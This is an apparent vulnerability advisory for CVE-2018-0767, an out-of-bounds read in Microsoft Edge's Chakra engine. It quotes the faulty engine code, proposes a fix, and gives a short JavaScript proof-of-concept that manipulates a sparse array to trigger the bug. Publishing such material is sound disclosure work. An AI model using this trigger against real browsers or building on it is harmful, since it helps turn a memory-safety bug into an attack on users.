Microsoft Edge: Chakra: OOB read in AppendLeftOverItemsFromEndSegment(CVE-2018-0767)

2018-01-2200:00:00

Root

www.seebug.org

EPSS

0.956

Percentile

99.5%

JSON

Here’s a snippet of AppendLeftOverItemsFromEndSegment in JavascriptArray.inl.

growby = endSeg-&gt;length;
current = current-&gt;GrowByMin(recycler, growby);
CopyArray(current-&gt;elements + endIndex + 1, endSeg-&gt;length,
    ((Js::SparseArraySegment&lt;T&gt;*)endSeg)-&gt;elements, endSeg-&gt;length);
LinkSegments((Js::SparseArraySegment&lt;T&gt;*)startPrev, current);
if (HasNoMissingValues())
{
    if (ScanForMissingValues&lt;T&gt;(endIndex + 1, endIndex + growby))
    {
        SetHasNoMissingValues(false);
    }
}

In the “ScanForMissingValues” method, it uses “head”. But it doesn’t check the grown segment “current” is equal to “head” before calling the method.
I guess it shoud be like:

if (current == head && HasNoMissingValues())
{
    if (ScanForMissingValues&lt;T&gt;(endIndex + 1, endIndex + growby))
    {
        SetHasNoMissingValues(false);
    }
}


function trigger() {
    let arr = [1.1];
    let i = 0;
    for (; i &lt; 1000; i += 0.5) {
        arr[i + 0x7777] = 2.0;
    }

    arr[1001] = 35480.0;

    for (; i &lt; 0x7777; i++) {
        arr[i] = 1234.3;
    }
}

for (let i = 0; i &lt; 100; i++) {
    trigger();
}

EPSS

0.956

Percentile

99.5%

JSON

Related for SSV:97092